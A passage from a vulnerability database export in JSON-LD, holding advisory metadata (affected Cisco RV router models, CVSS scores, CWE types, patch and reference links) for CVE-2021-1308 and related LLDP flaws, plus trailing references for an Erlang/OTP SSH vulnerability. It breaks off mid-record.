            "url": "http://www.openwall.com/lists/oss-security/2025/04/19/1"
          },
          {
            "trust": 1.8,
            "url": "https://security.netapp.com/advisory/ntap-20250425-0001/"
          },
          {
            "trust": 1.8,
            "url": "https://github.com/prodefense/cve-2025-32433/blob/main/cve-2025-32433.py"
          },
          {
            "trust": 1.0,
            "url": "https://github.com/erlang/otp/commit/6eef04130afc8b0ccb63c9a0d8650209cf54892f"
          },
          {
            "trust": 1.0,
            "url": "https://github.com/erlang/otp/commit/0fcd9c56524b28615e8ece65fc0c3f66ef6e4c12"
          },
          {
            "trust": 1.0,
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2025-32433"
          },
          {
            "trust": 1.0,
            "url": "https://github.com/erlang/otp/commit/b1924d37fd83c070055beb115d5d6a6a9490b891"
          },
          {
            "trust": 1.0,
            "url": "https://sec.cloudapps.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-erlang-otp-ssh-xyzzy"
          },
          {
            "trust": 1.0,
            "url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00028.html"
          },
          {
            "trust": 1.0,
            "url": "https://github.com/erlang/otp/security/advisories/ghsa-37cp-fgq5-7wc2"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu96418823/"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2025-32433"
          },
          {
            "trust": 0.8,
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
          },
          {
            "trust": 0.8,
            "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-140-07"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2025-006839"
          },
          {
            "db": "NVD",
            "id": "CVE-2025-32433"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2025-006839"
          },
          {
            "db": "NVD",
            "id": "CVE-2025-32433"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2025-06-13T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2025-006839"
          },
          {
            "date": "2025-04-16T22:15:14.373000",
            "db": "NVD",
            "id": "CVE-2025-32433"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2025-06-13T05:39:00",
            "db": "JVNDB",
            "id": "JVNDB-2025-006839"
          },
          {
            "date": "2025-11-04T14:49:05.177000",
            "db": "NVD",
            "id": "CVE-2025-32433"
          }
        ]
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Vulnerability related to lack of authentication for critical functions in ERLANG Erlang/OTP and products from multiple vendors",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2025-006839"
          }
        ],
        "trust": 0.8
      }
    }

    VAR-202104-0380

    Vulnerability from variot - Updated: 2024-11-23 22:37

    Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent)


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202104-0380",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv260w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv340w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv134w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv260",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv345",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv340w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv132w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv134w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv160w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv260w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv345",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv345",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv340",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv340w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv260",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv260w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv345p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv160",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv160w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv260p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv340",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv260",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv160w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv345p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv160",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv345p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv260p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv132w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv340",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv260p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv134w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv160",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv132w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv160 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340w dual wan gigabit wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv132w adsl2+ wireless-n vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260p vpn router with poe",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv134w vdsl2 wireless-ac vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "link layer discovery protocol",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35514"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005371"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1308"
          }
        ]
      },
      "cve": "CVE-2021-1308",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 6.1,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.5,
                "id": "CVE-2021-1308",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.9,
                "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 6.1,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.5,
                "id": "CNVD-2021-35514",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.4,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 2.8,
                "id": "CVE-2021-1308",
                "impactScore": 4.0,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Adjacent Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.4,
                "baseSeverity": "High",
                "confidentialityImpact": "None",
                "exploitabilityScore": null,
                "id": "CVE-2021-1308",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-1308",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2021-1308",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2021-1308",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2021-35514",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-434",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-1308",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35514"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1308"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005371"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-434"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1308"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1308"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent)",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-1308"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005371"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-35514"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1308"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-1308",
            "trust": 3.9
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005371",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-35514",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.1171.3",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-434",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1308",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35514"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1308"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005371"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-434"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1308"
          }
        ]
      },
      "id": "VAR-202104-0380",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35514"
          }
        ],
        "trust": 1.1394850175
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35514"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:37:02.748000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-rv-multi-lldp-u7e4chCe",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-multi-lldp-u7e4chCe"
          },
          {
            "title": "Patch for Cisco Link Layer Discovery Protocol buffer overflow vulnerability (CNVD-2021-35514)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/265676"
          },
          {
            "title": "Cisco Link Layer Discovery Protocol Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=147016"
          },
          {
            "title": "Cisco: Cisco Small Business RV Series Routers Link Layer Discovery Protocol Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-rv-multi-lldp-u7e4chCe"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35514"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1308"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005371"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-434"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-401",
            "trust": 1.0
          },
          {
            "problemtype": "Buffer error (CWE-119) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005371"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1308"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-multi-lldp-u7e4chce"
          },
          {
            "trust": 2.0,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1308"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.1171.3"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/119.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35514"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1308"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005371"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-434"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1308"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35514"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1308"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005371"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-434"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1308"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-05-19T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-35514"
          },
          {
            "date": "2021-04-08T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-1308"
          },
          {
            "date": "2021-12-13T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-005371"
          },
          {
            "date": "2021-04-07T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-434"
          },
          {
            "date": "2021-04-08T04:15:11.983000",
            "db": "NVD",
            "id": "CVE-2021-1308"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-05-19T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-35514"
          },
          {
            "date": "2021-04-15T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-1308"
          },
          {
            "date": "2021-12-13T09:08:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-005371"
          },
          {
            "date": "2022-08-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-434"
          },
          {
            "date": "2024-11-21T05:44:03.550000",
            "db": "NVD",
            "id": "CVE-2021-1308"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote or local",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-434"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Buffer error vulnerability in series routers",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005371"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-434"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202104-0381

    Vulnerability from variot - Updated: 2024-11-23 22:37

    Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202104-0381",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv260w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv340w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv134w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv260",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv345",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv340w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv132w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv134w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv160w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv260w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv345",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv345",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv340",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv340w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
